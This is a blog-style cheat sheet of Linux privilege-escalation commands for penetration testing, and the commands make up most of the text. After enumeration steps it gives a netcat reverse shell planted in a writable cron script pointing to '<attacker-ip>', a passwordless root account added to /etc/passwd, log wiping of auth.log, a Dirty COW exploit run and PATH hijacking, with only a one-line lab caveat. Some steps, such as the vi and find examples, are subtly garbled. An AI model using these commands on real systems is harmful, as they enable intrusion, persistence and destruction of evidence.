Privilege Escalation Techniques in Linux Penetration Testing

By /

Listen to this Post

You Should Know:

Privilege escalation is a critical phase in penetration testing, where an attacker gains higher-level permissions on a system. Below are some practical commands, techniques, and steps to identify and exploit privilege escalation vulnerabilities in Linux systems.

1. Enumeration Commands

  • Check Current User Privileges:
    id
whoami
  • List Sudo Permissions:
    sudo -l
  • Check for SUID/SGID Files:
    find / -perm -u=s -o -perm -g=s 2>/dev/null
  • Kernel Version Check:
    uname -a
  • List Running Processes:
    ps aux

2. Exploiting Misconfigured Sudo Permissions

  • If a user has sudo permissions for specific commands, you can exploit them to escalate privileges. For example:
    sudo vi /etc/passwd
  • Open `/etc/passwd` in Vi and add a new root user:
    :r!echo 'root2::0:0:root:/root:/bin/bash' >> /etc/passwd

3. Exploiting SUID/SGID Binaries

  • If you find SUID/SGID binaries, check for known exploits. For example, if `find` has SUID:
    touch test
find test -exec whoami \;

4. Kernel Exploits

  • Use tools like `Linux Exploit Suggester` to identify potential kernel vulnerabilities:
    ./linux-exploit-suggester.sh
  • Example: Dirty COW Exploit (CVE-2016-5195):
    gcc -pthread dirty.c -o dirty -lcrypt
./dirty

5. Exploiting Cron Jobs

  • Check for writable cron jobs:
    ls -la /etc/cron*
  • If a script is writable, inject a reverse shell or add a new user:
    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f" > script.sh

6. Password Hunting

  • Search for passwords in files:
    grep -ri "password" /home /var/www
  • Check history files:
    cat ~/.bash_history

7. Exploiting PATH Variable

  • If you can write to a directory in the PATH, create a malicious binary:
    echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

8. Using Metasploit for Privilege Escalation

  • Use Metasploit’s `post/multi/recon/local_exploit_suggester` module to identify potential exploits.

9. Post-Exploitation

  • After gaining root, maintain access:
    echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd
  • Clear logs:
    echo "" > /var/log/auth.log

What Undercode Say:

Privilege escalation is a cornerstone of penetration testing, requiring a deep understanding of system configurations and vulnerabilities. Always practice these techniques in a controlled environment. For further reading, check out:
Linux Privilege Escalation Guide
GTFOBins for bypassing restrictions.

Mastering these commands and techniques will significantly enhance your ability to identify and exploit privilege escalation vulnerabilities in Linux systems.

References:

Reported By: 0x Xnum – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: